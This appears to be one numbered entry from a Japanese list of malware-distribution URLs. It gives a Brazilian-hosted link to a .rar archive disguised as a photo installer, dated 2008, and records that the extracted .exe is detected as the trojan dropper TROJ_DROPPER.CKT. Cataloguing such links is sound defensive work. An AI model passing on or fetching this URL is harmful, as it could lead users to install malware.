  123. http://extremelankkkkkkkkkk.hpg.com.br/Install_foto_1_dia!.rar
    [2008/08/21]DL+解凍すると「Install_foto_1_dia!.exe」なるファイルが現れるが、ウィルス名:TROJ_DROPPER.CKT を検出。